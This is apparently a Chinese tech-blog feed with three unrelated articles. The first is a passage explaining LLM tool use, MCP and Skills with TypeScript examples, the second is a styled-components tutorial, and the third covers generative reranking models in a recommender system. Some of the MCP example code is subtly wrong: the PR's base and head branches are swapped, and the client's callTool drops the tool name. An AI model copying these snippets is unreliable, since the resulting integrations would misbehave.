这正是现在各种 AI Agent 框架的意义, 比如 LangChain, LangGraph, Agno 等, 它们底层其实也都是做这种事情, 和传统领域的框架一样, 把繁琐的步骤都封装好了, 就像写 React 就不需要手动去操作 DOM 一样.

MCP

上面的方式虽然繁琐, 但也完全覆盖了所有场景了. 任何 tool use 都可以用上面的方式去实现. 那么为什么还需要 MCP 呢?

MCP 是什么

MCP (model context protocol) 是一个协议, 定义了 MCP Client 和 MCP Server 的通信方式. MCP 的原理和 AI/LLM 没有任何关系, 只是定义了 tools/resources/prompt 三种信息的通信格式.

MCP 解决了什么问题

假设现在没有 MCP 这个概念.

众所周知, LLM 非常擅长写文档类的东西, 比如 PR description. 所以现在你想让 LLM 帮你在 github 提一个 PR. 你需要先定义一个 tool:

const tools: ToolUnion[] = [
  {
    name: 'github_create_pr',
    description: 'create a PR on github',
    input_schema: {
      type: 'object',
      properties: {
        repo: {
          type: 'string',
          description: 'The repo name. Format: {owner}/{repo_name}',
        },
        source_branch: {
          type: 'string',
          description: 'The source branch name',
        },
        target_branch: {
          type: 'string',
          description: 'The target branch name',
        },
        title: {
          type: 'string',
          description: 'The title of the PR',
        },
        description: {
          type: 'string',
          description: 'The description body of the PR',
        },
      },
    },
  },
];

然后实现这个 tool 的调用过程:

case 'github_create_pr':
  const { repo, source_branch, target_branch, title, description } = block.input;
  const [owner_name, repo_name] = repo.split('/');

  try {
    // 也可以用 gh cli
    const resp = await fetch(`https://api.github.com/repos/${owner_name}/${repo_name}/pulls`, {
      method: 'post',
      headers: {
        accept: 'application/vnd.github+json',
        authorization: 'Bearer GITHUB_TOKEN',
      },
      body: JSON.stringify({
        title,
        body: description,
        base: source_branch,
        head: target_branch,
      }),
    });

    toolUseResults.push({
      tool_use_id: block.id,
      type: 'tool_result',
      content: await resp.text(),
      is_error: false,
    });
  } catch (err) {
    toolUseResults.push({
      tool_use_id: block.id,
      type: 'tool_result',
      content: JSON.stringify(err),
      is_error: true,
    });
  }
  break;

每加一个这样的 tool, 都需要花费大量的精力. 但实际上这些 tools 是高度通用的, 调用 github 是一个很普遍的需求.

此时你可能想到, 那我封装一个 github_tools 不就可以了?

于是你行动力拉满, 自己(或者让 AI)封装了一个 github_tools, 发布到了 npm 上, 其他用户可以像这样使用你的库:

import { tools as githubTools, callTool } from '@arc/github_tools';

const tools = [...myTools, ...githubTools];

for (const block of resp.content) {
  if (block.type === 'tool_use') {
    if (block.name.startsWith('github')) {
      const result = await callTool(block);
    }
  }
}

但是此时又有了两个新的问题:

  1. 你的新项目使用了 Go/Rust, 用不了 npm 包.
  2. 由于 Anthropic API 太贵, 你决定迁移到 DeepSeek API, 但是 DeepSeek 对 Anthropic 的兼容性不是很好(假设), 有些格式不匹配, 导致你的库调用失败.

MCP 的出现就是为了解决上面的问题. MCP 本质上是把 tools 的定义和执行都外置出去了. MCP 分为 Client 和 Server, 其中 Server 就是外置出去的部分, 负责 tools 的定义和执行. 而 Client 就是留在 AI 应用的部分, 负责和 Server 通信:

  • Hi Server, 告诉我有哪些 tools 可以用?
  • Hi Server, 我现在要调用 github_create_pr 这个 tool, 参数是 { xxx }

最简易的 MCP 实现

知道了 MCP 的设计思想, 那么我们完全可以写一个最简易的实现:

const server = async ({ type, body }: { type: string; body?: any }): Promise<string> => {
  if (type === 'list_tools') {
    return JSON.stringify([
      {
        name: 'github_create_pr',
        description: 'create a PR on github',
        input_schema: {
          type: 'object',
          properties: {
            repo: {
              type: 'string',
              description: 'The repo name. Format: {owner}/{repo_name}',
            },
            source_branch: {
              type: 'string',
              description: 'The source branch name',
            },
            target_branch: {
              type: 'string',
              description: 'The target branch name',
            },
            title: {
              type: 'string',
              description: 'The title of the PR',
            },
            description: {
              type: 'string',
              description: 'The description body of the PR',
            },
          },
        },
      },
    ]);
  }

  if (type === 'call_tool') {
    switch (body.name) {
      case 'github_create_pr':
        const { repo, source_branch, target_branch, title, description } = body.input;
        const [owner_name, repo_name] = repo.split('/');
        try {
          const resp = await fetch(`https://api.github.com/repos/${owner_name}/${repo_name}/pulls`, {
            method: 'post',
            headers: {
              accept: 'application/vnd.github+json',
              authorization: 'Bearer GITHUB_TOKEN',
            },
            body: JSON.stringify({
              title,
              body: description,
              base: source_branch,
              head: target_branch,
            }),
          });
          return await resp.text();
        } catch (err) {
          return JSON.stringify(err);
        }
    }
  }

  return 'Unknown type';
};

为了简单起见, 我直接写的是一个函数. 你完全可以将其做成一个 HTTP server, 因为反正这个函数的返回类型是 string, 可以作为 HTTP Response.

然后再写一个 client:

class McpClient {
  async listTools() {
    const tools = await server({ type: 'list_tools' });
    return JSON.parse(tools) as ToolUnion[];
  }

  async callTool(name: string, params: any) {
    const res = await server({ type: 'call_tool', body: params });
    return res;
  }
}

发现了吗? 上面的代码和 LLM 一点关系都没有, 这也是我一直在强调的重点: MCP 是工程设计, 不是 LLM 自身能力. 你完全可以脱离 AI, 直接使用 github 的官方 mcp server, 手动调用里面提供的方法. AI 在这里面唯一做的事情只是帮你决定调用的 tool_name + params.

用我们自己实现的 MCP Client 和 Server 改写上面的代码:

const messages: MessageParam[] = [
  {
    role: 'user',
    content: `分析一下 package.json`,
  },
];

const mcpClient = new McpClient();
const resp = await client.messages.create({
  max_tokens: 1024,
  messages,
  model: 'glm-4.7-flash',
  tools: await mcpClient.listTools(),
});

const toolUseResults: ContentBlockParam[] = [];
for (const block of resp.content) {
  if (block.type === 'tool_use') {
    if (block.name.startsWith('github')) {
      try {
        const result = await mcpClient.callTool(block.name, block.input);
        toolUseResults.push({ tool_use_id: block.id, type: 'tool_result', content: result, is_error: false });
      } catch (err) {
        toolUseResults.push({
          tool_use_id: block.id,
          type: 'tool_result',
          content: JSON.stringify(err),
          is_error: true,
        });
      }
    }
  }
}
messages.push({ role: 'user', content: toolUseResults });

const resp2 = await client.messages.create({
  max_tokens: 1024,
  messages,
  model: 'glm-4.7-flash',
  tools,
});
console.log(resp2);

瞬间简洁了不少. github 相关的 tools 定义和实现都外置到了 MCP Server 上, 这样就做了两层解耦:

  1. 具体语言解耦 - 你可以用任何语言实现 MCP Server, 只要它能处理字符串.
  2. LLM 解耦 - 你可以用任何支持 tool use 的 LLM, MCP 协议里单独定义了字段, 和 LLM 自己的字段无关.

Skills

现在你已经了解到了:

  1. Tool Use 是 LLM 自身的能力.
  2. MCP 不是 LLM 自身的能力, 而是工程设计, 辅助 Tool Use 用的.

那么最近很火的 Skills 又是什么呢? 是取代 MCP 的吗? 当然不是.

LLM 的 context 是非常宝贵的. 如果在系统提示词里放入太多的内容, 会导致系统提示词本身就占据大量 context. 举个例子, 假设你在开发一个 Coding Agent, 你集成了 github MCP Server, 那么每次 LLM API 调用, 都会把完整的 github MCP 相关的 tools 定义全部发给 LLM. 如果绝大部分用户根本就不会用 github 的能力, 那你就平白无故浪费了大量 context.

这就是 Skills 解决的问题: 渐进式披露, 或者叫按需加载.

我个人猜测 Skills 应该也是工程设计, 也不是 LLM 的能力, 因为我们完全可以自己实现一套机制, 用下面的系统提示词:

你是一个全能专家. 你拥有以下技能:

1. 做饭: 川菜, 粤菜, 日料, 英国美食.
2. 旅游: 规划旅游路线, 选择最佳景点, 解说历史遗迹.
3. 写代码: Typescript, Rust, Go, Python.
...
99. 视频制作: 制作爆款视频, 通过制造各种对立吸引流量.
100. Slides 制作: 制作精美的, 吸引领导眼光的 Slides.

所有的技能都被单独放到了 .skills 目录里. 当用户的问题与某个技能相关时, 你需要使用 Read tool 来读取对应技能的全部文档.

看到了吗? 系统提示词里只放了最基本的技能名字和简介(也就是 SKILL.md 开头的 name + description), 没有放具体技能的内容 (比如具体怎么做菜, 具体怎么写代码, 具体制造哪种对立更符合当下的热点), 大幅节约了 context.

如果此时用户问"帮我用 Rust 写个基本的 HTTP Server", 那么 LLM 第一条返回的消息应该就包含一个 read 的 tool_use, 读取 .skills/coding 里所有的内容, 里面就会包含具体的细节, 比如 "不要用 unwrap", "优先使用 axum 框架" 等. 用户把这些内容通过 tool_use_result 发给 LLM 后, LLM 再去写最终的代码给用户.

所以 Skills 也并不是什么神奇的事情, 并不是说 Skills 赋予了 AI 大量额外的能力, 只是单纯地通过按需加载, 节约了 context, 从而可以放大量的 Skills 在目录里. 毕竟在 Skills 出现之前, 你完全也可以把具体的写代码能力写到系统提示词里, LLM 照样会拥有完整的写代码的能力.

总结

本文从 0 开始一步步讲述了 LLM API 的设计, 多轮对话, 原生 Tool Use 的方式, MCP 的原理, Skills 的思想. 让我们回顾一下几个核心要点:

Tool Use - LLM 的核心能力

Tool Use 是 LLM 模型本身的能力, 需要模型在训练时就支持. 它让 LLM 能够:

  • 理解工具的定义和参数
  • 根据用户意图决策应该调用哪个工具
  • 结构化的格式输出工具调用信息

如果一个 LLM 不支持 Tool Use, 我们几乎无法通过工程手段来弥补, 因为用 prompt 的方式既不可靠, 又难以解析.

MCP - 工程层面的协议

MCP 是纯粹的工程设计, 和 AI 完全无关. 它解决的是工程问题:

  • 跨语言: 用任何语言都可以实现 MCP Server, 不局限于某个生态
  • 解耦: tools 的定义和实现从应用代码中分离出去
  • 复用: 同一个 MCP Server 可以被多个应用、多个 LLM 使用
  • 标准化: 统一了工具的通信协议, 避免了各自为政

MCP 的价值在于降低了集成成本, 让开发者可以专注于业务逻辑, 而不是重复造轮子.

Skills - 优化 Context 的策略

Skills 同样是工程层面的优化, 核心思想是:

  • 按需加载: 不把所有能力都塞进系统提示词
  • 渐进式披露: 需要什么能力才加载什么内容
  • 节约 Context: 让有限的 context window 发挥更大价值

Skills 不是新技术, 而是一种最佳实践模式, 在 Skills 概念出现之前我们就可以自己实现类似机制.

三者的关系

Tool Use, MCP, Skills 并不是互相取代的关系, 而是相辅相成:

┌─────────────────────────────────────────┐
│          AI Application                 │
│  ┌────────────────────────────────┐     │
│  │  Skills (按需加载能力)          │     │
│  │  - 系统提示词优化                │     │
│  │  - Context 管理                 │     │
│  └────────────────────────────────┘     │
│                                         │
│  ┌────────────────────────────────┐     │
│  │  MCP Client (工具集成层)        │     │
│  │  - 从 MCP Server 获取工具定义    │     │
│  │  - 调用 MCP Server 执行工具     │     │
│  └────────────────────────────────┘     │
│                    ↓                    │
│  ┌────────────────────────────────┐     │
│  │  LLM with Tool Use (AI 能力层) │     │
│  │  - 理解工具                      │     │
│  │  - 决策调用                      │     │
│  └────────────────────────────────┘     │
└─────────────────────────────────────────┘
                    ↕
        ┌──────────────────────┐
        │   MCP Server (外部)   │
        │   - github tools      │
        │   - filesystem tools  │
        │   - database tools    │
        └──────────────────────┘
  • Tool Use 是基础, 没有它其他都无从谈起
  • MCP 让工具的集成变得简单和标准化
  • Skills 让能力的组织变得高效

实践建议

在实际开发 AI 应用时:

  1. 选择支持 Tool Use 的 LLM: 这是硬性要求, 没有商量余地
  2. 优先使用现有的 MCP Server: 不要重复造轮子, github/filesystem 等常用工具都有官方 MCP Server
  3. 合理组织 Skills: 如果你的系统提示词超过几千 tokens, 考虑用 Skills 模式进行按需加载
  4. 理解工程本质: MCP 和 Skills 都是工程问题, 理解其原理后完全可以根据需求自己实现或调整

最后

希望本文帮助你厘清了 Tool Use, MCP, Skills 三者的关系. 记住核心观点: Tool Use 是 AI 能力, MCP 和 Skills 是工程设计. 它们各司其职, 共同构建了现代 AI Agent 的能力体系.

当你在开发 AI 应用时遇到问题, 先问自己: 这是 LLM 能力的问题, 还是工程设计的问题? 如果是 LLM 能力的问题, 我们就没法自己解决了, 只能换 LLM; 如果是工程设计的问题, 在这个极高速发展的行业, 如果还没有解决方案, 那我们是完全有能力去解决的.

目前属于 LLM 能力(需要训练支持)的概念:

  • Tool Use
  • Thinking
  • Structured Output
  • Multimodal

属于工程设计, 但是很难去 polyfill, 需要服务提供方支持的概念:

  • Streaming
  • Cache
  • Batch API

属于工程设计, 并且比较容易 polyfill 的概念:

  • MCP
  • Skills
  • SubAgent

React 样式——styled-components

作者 随意_
2026年2月14日 10:40

在 React 开发中,样式管理一直是绕不开的核心问题 —— 全局 CSS 命名冲突、动态样式繁琐、样式与组件解耦难等痛点,长期困扰着前端开发者。而 styled-components 作为 React 生态中最主流的 CSS-in-JS 方案,彻底颠覆了传统样式编写方式,将样式与组件深度绑定,让样式管理变得简洁、可维护且灵活。本文将从核心原理、基础语法、进阶技巧到实战场景,全面拆解 styled-components 的使用精髓,涵盖原生标签、自定义组件、第三方组件适配等全场景用法。

一、什么是 styled-components?

styled-components 是一款专为 React/React Native 设计的 CSS-in-JS 库,核心思想是 “将 CSS 样式写在 JavaScript 中,并与组件一一绑定”。它由 Max Stoiber 于 2016 年推出,目前 GitHub 星数超 40k,被 Airbnb、Netflix、Spotify 等大厂广泛采用。

核心优势

  1. 样式封装,杜绝污染:每个样式组件生成唯一的 className,彻底解决全局 CSS 命名冲突问题;
  2. 动态样式,灵活可控:直接通过组件 props 控制样式,无需拼接 className 或写内联样式;
  3. 自动前缀,兼容省心:自动为 CSS 属性添加浏览器前缀(如 -webkit--moz-),无需手动处理兼容;
  4. 语义化强,易维护:样式与组件代码同文件,逻辑闭环,可读性和可维护性大幅提升;
  5. 按需打包,体积优化:打包时自动移除未使用的样式,减少冗余代码;
  6. 通用适配,场景全覆盖:既支持 HTML 原生标签,也兼容自定义组件、第三方 UI 组件(如 KendoReact/Ant Design)。

二、基础语法:从原生 HTML 标签到样式组件

styled-components 的核心语法分为两种形式,分别适配不同场景,是掌握该库的基础。

1. 安装

在 React 项目中安装核心依赖(TypeScript 项目可额外安装类型声明):

# npm
npm install styled-components

# yarn
yarn add styled-components

# TypeScript 类型声明(新版已内置,可选)
npm install @types/styled-components --save-dev

2. 语法形式 1:styled.HTML标签(原生标签快捷写法)

这是最常用的基础语法,styled. 后紧跟 HTML 原生标签名(如 div/button/p/h1/input 等),本质是 styled() 函数的语法糖,用于快速创建带样式的原生 HTML 组件。

多标签示例:覆盖高频 HTML 元素

import React from 'react';
import styled from 'styled-components';

// 1. 布局容器:div
const Container = styled.div`
  width: 90%;
  max-width: 1200px;
  margin: 20px auto;
  padding: 24px;
  border: 1px solid #e5e7eb;
  border-radius: 8px;
  box-shadow: 0 2px 4px rgba(0,0,0,0.05);
`;

// 2. 标题:h1/h2
const TitleH1 = styled.h1`
  color: #1f2937;
  font-size: 32px;
  font-weight: 700;
  margin-bottom: 16px;
`;

// 3. 文本:p/span
const Paragraph = styled.p`
  color: #4b5563;
  font-size: 16px;
  line-height: 1.6;
  margin-bottom: 12px;
`;
const HighlightText = styled.span`
  color: #2563eb;
  font-weight: 500;
`;

// 4. 交互:button/a
const PrimaryButton = styled.button`
  padding: 10px 20px;
  background-color: #2563eb;
  color: white;
  border: none;
  border-radius: 6px;
  cursor: pointer;
  &:hover { background-color: #1d4ed8; }
  &:disabled { background-color: #93c5fd; cursor: not-allowed; }
`;
const Link = styled.a`
  color: #2563eb;
  text-decoration: none;
  &:hover { text-decoration: underline; color: #1d4ed8; }
`;

// 5. 表单:input/label
const FormLabel = styled.label`
  display: block;
  font-size: 14px;
  color: #374151;
  margin-bottom: 6px;
`;
const Input = styled.input`
  width: 100%;
  padding: 10px 12px;
  border: 1px solid #d1d5db;
  border-radius: 6px;
  &:focus {
    outline: none;
    border-color: #2563eb;
    box-shadow: 0 0 0 2px rgba(37, 99, 235, 0.2);
  }
`;

// 6. 列表:ul/li
const List = styled.ul`
  margin: 16px 0;
  padding-left: 24px;
`;
const ListItem = styled.li`
  margin-bottom: 8px;
  &:last-child { margin-bottom: 0; }
`;

// 使用示例
function BasicTagDemo() {
  return (
    <Container>
      <TitleH1>原生标签样式化示例</TitleH1>
      <Paragraph>
        这是 <HighlightText>styled.p</HighlightText> 渲染的段落,支持 <HighlightText>styled.span</HighlightText> 行内样式。
      </Paragraph>
      <List>
        <ListItem>styled.div:布局容器核心标签</ListItem>
        <ListItem>styled.button:交互按钮,支持 hover/禁用状态</ListItem>
        <ListItem>styled.input:表单输入框,支持焦点样式</ListItem>
      </List>
      <FormLabel htmlFor="username">用户名</FormLabel>
      <Input id="username" placeholder="请输入用户名" />
      <PrimaryButton style={{ marginTop: '10px' }}>提交</PrimaryButton>
      <Link href="#" style={{ marginLeft: '10px' }}>忘记密码?</Link>
    </Container>
  );
}

3. 语法形式 2:styled(组件)(自定义 / 第三方组件适配)

当需要给自定义 React 组件第三方 UI 组件添加样式时,必须使用 styled() 通用函数(styled.xxx 仅支持原生标签)。

核心要求

被包裹的组件需接收并传递 className 属性到根元素(第三方组件库如 KendoReact/AntD 已内置支持)。

示例 1:给自定义组件加样式

import React from 'react';
import styled from 'styled-components';

// 自定义组件:必须传递 className 到根元素
const MyButton = ({ children, className }) => {
  // 关键:将 className 传给根元素 <button>,样式才能生效
  return <button className={className}>{children}</button>;
};

// 用 styled() 包裹自定义组件,添加样式
const StyledMyButton = styled(MyButton)`
  background-color: #28a745;
  color: white;
  border: none;
  padding: 8px 16px;
  border-radius: 4px;
  &:hover { background-color: #218838; }
`;

function CustomComponentDemo() {
  return <StyledMyButton>自定义组件样式化</StyledMyButton>;
}

示例 2:给第三方组件(KendoReact)加样式

import React from 'react';
import styled from 'styled-components';
// 引入 KendoReact 按钮组件
import { Button } from '@progress/kendo-react-buttons';

// 用 styled() 覆盖第三方组件默认样式
const StyledKendoButton = styled(Button)`
  background-color: #dc3545 !important; /* 覆盖组件内置样式 */
  border-color: #dc3545 !important;
  color: white !important;
  padding: 8px 16px !important;
  
  &:hover {
    background-color: #c82333 !important;
  }
`;

function ThirdPartyComponentDemo() {
  return <StyledKendoButton>自定义样式的 KendoReact 按钮</StyledKendoButton>;
}

4. 两种语法的关系

styled.xxxstyled('xxx') 的语法糖(如 styled.div = styled('div')),仅简化原生标签的写法;而 styled(组件) 是通用方案,覆盖所有组件类型,二者底层均基于 styled-components 的样式封装逻辑。

三、进阶技巧:提升开发效率与可维护性

掌握基础语法后,这些进阶技巧能适配中大型项目的复杂场景。

1. 动态样式:通过 Props 控制样式

这是 styled-components 最核心的特性之一,无需拼接 className,直接通过 props 动态调整样式,适配状态切换、主题变化等场景。

jsx

import React from 'react';
import styled from 'styled-components';

// 带 props 的动态按钮
const DynamicButton = styled.button`
  padding: ${props => props.size === 'large' ? '12px 24px' : '8px 16px'};
  background-color: ${props => {
    switch (props.variant) {
      case 'primary': return '#2563eb';
      case 'danger': return '#dc3545';
      case 'success': return '#28a745';
      default: return '#6c757d';
    }
  }};
  color: white;
  border: none;
  border-radius: 6px;
  cursor: pointer;
  &:hover { opacity: 0.9; }
`;

function DynamicStyleDemo() {
  return (
    <div style={{ gap: '10px', display: 'flex', padding: '20px' }}>
      <DynamicButton variant="primary" size="large">主要大按钮</DynamicButton>
      <DynamicButton variant="danger">危险默认按钮</DynamicButton>
      <DynamicButton variant="success">成功按钮</DynamicButton>
    </div>
  );
}

2. 样式继承:复用已有样式

基于已定义的样式组件扩展新样式,避免重复代码,提升复用性。

import styled from 'styled-components';

// 基础按钮(通用样式)
const BaseButton = styled.button`
  padding: 8px 16px;
  border: none;
  border-radius: 4px;
  color: white;
  cursor: pointer;
  font-size: 14px;
`;

// 继承基础按钮,扩展危险按钮样式
const DangerButton = styled(BaseButton)`
  background-color: #dc3545;
  &:hover { background-color: #c82333; }
`;

// 继承并覆盖样式:轮廓按钮
const OutlineButton = styled(BaseButton)`
  background-color: transparent;
  border: 1px solid #2563eb;
  color: #2563eb;
  &:hover {
    background-color: #2563eb;
    color: white;
    transition: all 0.2s ease;
  }
`;

3. 全局样式:重置与全局配置

通过 createGlobalStyle 定义全局样式(如重置浏览器默认样式、设置全局字体),只需在根组件中渲染一次即可生效。

import React from 'react';
import styled, { createGlobalStyle } from 'styled-components';

// 全局样式组件
const GlobalStyle = createGlobalStyle`
  /* 重置浏览器默认样式 */
  * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
  }

  /* 全局字体和背景 */
  body {
    font-family: 'Microsoft YaHei', sans-serif;
    background-color: #f8f9fa;
    color: #333;
  }

  /* 全局链接样式 */
  a {
    text-decoration: none;
    color: #2563eb;
  }
`;

// 根组件中使用
function App() {
  return (
    <>
      <GlobalStyle /> {/* 全局样式生效 */}
      <div>应用内容...</div>
    </>
  );
}

4. 主题管理(ThemeProvider):全局样式统一

在中大型项目中,通过 ThemeProvider 统一管理主题(主色、副色、字体),支持主题切换(如浅色 / 暗黑模式)。

import React, { useState } from 'react';
import styled, { ThemeProvider } from 'styled-components';

// 定义主题对象
const lightTheme = {
  colors: { primary: '#2563eb', background: '#f8f9fa', text: '#333' },
  fontSize: { small: '12px', medium: '14px' }
};
const darkTheme = {
  colors: { primary: '#198754', background: '#212529', text: '#fff' },
  fontSize: { small: '12px', medium: '14px' }
};

// 使用主题样式
const ThemedCard = styled.div`
  padding: 20px;
  background-color: ${props => props.theme.colors.background};
  color: ${props => props.theme.colors.text};
  border-radius: 8px;
`;
const ThemedButton = styled.button`
  padding: 8px 16px;
  background-color: ${props => props.theme.colors.primary};
  color: white;
  border: none;
  border-radius: 4px;
`;

function ThemeDemo() {
  const [isDark, setIsDark] = useState(false);
  return (
    <ThemeProvider theme={isDark ? darkTheme : lightTheme}>
      <div style={{ padding: '20px' }}>
        <button onClick={() => setIsDark(!isDark)}>
          切换{isDark ? '浅色' : '暗黑'}主题
        </button>
        <ThemedCard style={{ marginTop: '10px' }}>
          <ThemedButton>主题化按钮</ThemedButton>
        </ThemedCard>
      </div>
    </ThemeProvider>
  );
}

5. 嵌套样式:模拟 SCSS 语法

支持样式嵌套,贴合组件 DOM 结构,减少选择器冗余。

const Card = styled.div`
  width: 300px;
  padding: 20px;
  border: 1px solid #eee;
  border-radius: 8px;

  /* 嵌套子元素样式 */
  .card-title {
    font-size: 20px;
    margin-bottom: 10px;
  }
  .card-content {
    font-size: 14px;
    /* 深层嵌套 */
    .highlight { color: #2563eb; }
  }
`;

四、实战场景:什么时候用 styled-components?

  1. 中大型 React 项目:需要严格样式封装,避免多人协作时的样式冲突;
  2. 动态样式频繁的场景:如按钮状态切换、主题切换、响应式布局;
  3. 组件库开发:样式与组件逻辑内聚,便于组件发布和复用;
  4. 第三方组件库定制:覆盖 KendoReact/AntD 等组件的默认样式,精准且不污染全局;
  5. 响应式开发:通过媒体查询快速适配不同屏幕尺寸,样式与组件同文件更易维护。

五、注意事项与最佳实践

  1. 避免过度嵌套:嵌套层级建议不超过 2-3 层,否则可读性下降;
  2. 自定义组件必传 className:用 styled(组件) 时,确保组件将 className 传给根元素;
  3. 慎用!important:覆盖第三方组件样式时,优先提高选择器优先级,而非直接用 !important
  4. 样式组件定义在外部:避免在渲染函数内定义样式组件(导致每次渲染重新创建);
  5. 调试优化:安装 babel-plugin-styled-components 插件,让开发者工具显示有意义的 className;
  6. 抽离通用样式:将重复样式抽离为基础组件或主题变量,减少冗余。

六、总结

styled-components 并非简单的 “CSS 写在 JS 里”,而是 React 组件化思想在样式领域的延伸。其核心价值在于:

  1. 语法灵活styled.xxx 适配原生标签,styled(组件) 适配自定义 / 第三方组件,覆盖全场景;
  2. 样式闭环:样式与组件绑定,杜绝全局污染,提升可维护性;
  3. 动态能力:通过 props 和 ThemeProvider 轻松实现动态样式和主题管理;
  4. 生态兼容:无缝对接 KendoReact/AntD 等主流组件库,降低定制成本。

对于 React 开发者而言,掌握 styled-components 不仅能解决传统样式方案的痛点,更能构建出更健壮、易扩展的组件体系,是中大型 React 项目样式管理的首选方案。

社区推荐重排技术:双阶段框架的实践与演进|得物技术

作者 得物技术
2026年2月12日 13:48

一、背景

推荐系统典型pipeline

在推荐系统多阶段Pipeline(召回→粗排→精排→重排)中,重排作为最终决策环节,承担着将精排输出的有限候选集(通常为Top 100–500个Item)转化为最优序列的关键职责。数学定义为在给定候选集C={x1,x2,,xn}C = \lbrace x_1,x_2,……,x_n \rbrace与目标列表长度LL,重排的目标是寻找一个排列πP(C,L)\pi^* \in P(C,L),使得全局收益函数最大化。

在推荐系统、搜索排序等AI领域,Pointwise 建模是精排阶段的核心方法,即对每个 Item 独立打分后排序,pointwise 建模范式面临挑战:

  • 多样性约束:精排按 item 独立打分排序 → 高分 item 往往语义/类目高度同质(如5个相似短视频连续曝光)。
  • 位置偏差:用户注意力随位置显著衰减,且不同item对位置敏感度不同。
  • 上下文建模:用户决策是序列行为,而非独立事件。

二、重排架构演进:生成式模型实践

我们的重排系统采用G-E两阶段协同框架:

  • 生成阶段(Generation):高效生成若干高质量候选排列。
  • 评估阶段(Evaluation):对候选排列进行精细化打分,选出全局最优结果。

不考虑算力和耗时的情况下,通过穷举所有排列P(C,L)P(C,L)

生成阶段主要依赖启发式规则、随机扰动 + beamSearch算法生成候选list,双阶段范式存在显著的痛点:

  • 质量-延迟-多样性的“不可能三角”:在实践中,增加生成候选list数一般可以提升最终list的质量,但边际收益递减;优化过程中,我们通过增加多目标、多样性等策略都取得了消费指标的提升,但在候选list达到百量级时,单纯增加候选集对指标的提升,同时还有:
  1. 增加beam width,系统耗时增加,DCG@K提升逐渐减少。

  2. 增加通道数,通道间重叠度逐渐增加,去重list增加逐渐减少。

  • 阶段间目标不一致:
  1. 分布偏移:启发式生成Beam Search输出的Top排列中,20%被评估模型否定,生成阶段搜索效率浪费。

  2. 梯度断层:Beam Search含argmax操作,双阶段无法端到端优化;生成模型无法感知评估反馈,优化方向偏离全局最优。

生成模型优化

生成分为启发式方法和生成式模型方法, 一般认为生成式模型方法要好于启发式方法。生成式模型逐渐成为重排主流范式,主要分为两类:自回归生成模型、非自回归生成模型。

  • 自回归生成:按位置顺序逐个生成物品,第 t 位的预测依赖前 t-1 位已生成结果。
  1. 优点:

a. 序列依赖建模强,天然捕获物品间的顺序依赖。

b. 训练简单稳定,每步使用真实前序作为输入,收敛快。

c. 生成质量高,逐步细化决策,适合长序列精细优化。

  1. 缺点:

a. 推理延迟高,生成 L 个物品需 L 次前向传播,线上服务难以满足毫秒级要求。

b. 局部最优风险,早期错误决策无法回溯修正,影响整体序列质量。

  • 非自回归生成:一次性预测整个推荐序列的所有位置,各位置预测相互独立。
  1. 优点:

a. 推理速度极快:生成整个序列仅需1次前向传播。

2.缺点:

b.条件独立性假设过强:各位置并行预测,难以显式建模物品间复杂依赖关系。

非自回归模型

为了对齐双阶段一致性,同时考虑线上性能,我们推进了非自回归模型的上线。模型结构如下图:

模型包括Candidates Encoder和Position Encoder,Candidates Encoder是标准的Transformer结构, 用于获取item间的交互信息;Position Encoder额外增加了Cross Attention,期望Position序列同时关注Candidate序列。

  • 模型特征:用户信息、item特征、位置信息、上游精排打分特征。
  • 模型输出:一次性输出 n×L 的位置-物品得分矩阵(n 为候选 item 数,L 为目标列表长度),支持高效并行推理
p^ij=exp(xitj)i=1nexp(xitj)\hat{p}_{ij} = \frac{\exp(\mathbf{x}_i^\top \mathbf{t}_j)}{\sum_{i=1}^n \exp(\mathbf{x}_i^\top \mathbf{t}_j)}
  • 位置感知建模:引入可学习位置嵌入,显式建模“同一 item 在不同位置表现不同”的现象(如首屏效应、位置衰减)。
  • 训练目标:模型使用logloss,让正反馈label序列的生成概率最大, 同时负反馈label序列的生成概率最小:
Llog=i[pijyilog(pij^)+pij(1yi)log(1pij^)]\mathcal{L}_{\log} = -\sum_{i} \big[ p_{ij}y_i \log(\hat{p_{ij}}) + p_{ij}(1-y_i) \log(1-\hat{p_{ij}}) \big]

其中,pijp_{ij}表示位置i上是否展示物品j,yiy_{i}表示位置i上的label。

线上实验及收益:

  • 一期新增了非自回归生成通道,pvctr +0.6%,时长+0.55%。
  • 二期在所有通道排序因子中bagging非自回归模型,pvctr +1.0%,时长+1.13%。

自回归模型

由于条件独立性假设, 非自回归模型对上下文信息建模是不够的,近期我们重点推进了自回归模型的开发。

模型通过Transformer架构建模list整体收益,我们使用单向transformer模拟用户浏览行为的因果性,同时解决自回归生成的暴露偏差问题,保持训练和推理的一致性。结构如下:

  • 模型特征:用户信息、item特征、位置信息、上游精排打分特征。
  • 训练目标:模型使用有序回归loss,在评估多个回合中不同长度的子列表时,能够很好地体现出序列中的增量价值。是用于判断长度为j的子列表是否已经达到i次点击或转化的损失函数。
Li,j(θj)=k=1N([yk<i]log(1pi,j(xk))+[yki]log(pi,j(xk)))L_{i,j}(\theta_j) = -\sum_{k=1}^{N} \left([y_k < i]\log(1-p_{i,j}(x_k)) + [y_k \geq i]\log(p_{i,j}(x_k))\right)

线上模型推理效率优化及实验效果:

自回归生成模型推理延迟高,生成 L 个物品需 L 次前向传播,线上服务难以满足毫秒级要求。因此,我们在传统自回归生成模型的基础上增加MTP(multi token prediction)结构,突破生成式重排模型推理瓶颈。其核心思想是将传统自回归的单步预测扩展为单步多token联合预测,显著减少生成迭代次数。

自回归生成模型在社区推荐已完成了推全,实验中我们新增了自回归生成模型通道,但不是完全体,仅部分位置生成调用了模型:

  • 一期调用两次模型,每次预测4个位置,pvctr +0.69%,有效vv +0.58%。
  • 二期调用两次模型,每次预测5个位置,pvctr +0.54%,有效vv +0.40%。

三、推理性能优化:端到端生成的效率保障

工程架构

为解决CPU推理模型延迟高、制约业务效果的问题,我们对DScatter模型服务进行升级,引入高性能GPU推理能力,具体方案如下:

  • GPU推理框架集成与升级:
  1. 框架升级:将现有依赖的推理框架升级为支持GPU的高性能服务框架。

  2. 硬件资源引入:引入 NVIDIA L20 等专业推理显卡,为当前的listwise评估模型及自回归生成模型提供专用算力,实现模型推理的硬件加速。

  • DScatter模型服务独立部署与容量提升:
  1. 为解决模型部署效率低与资源竞争问题,将DScatter的模型打分逻辑从现有重排服务中完全解耦,构建并部署独立的 DScatter-Model-Server 集群,从根本上消除与重排服务在CPU、内存等关键资源上的竞争。

模型优化

  • 模型格式转换与加速:

导出为 ONNX 格式,使用 TensorRT 进行量化、层融合、动态张量显存等技术加速推理。

  • Item Embedding缓存:

预计算item静态网络,线上直接查询节省计算量。
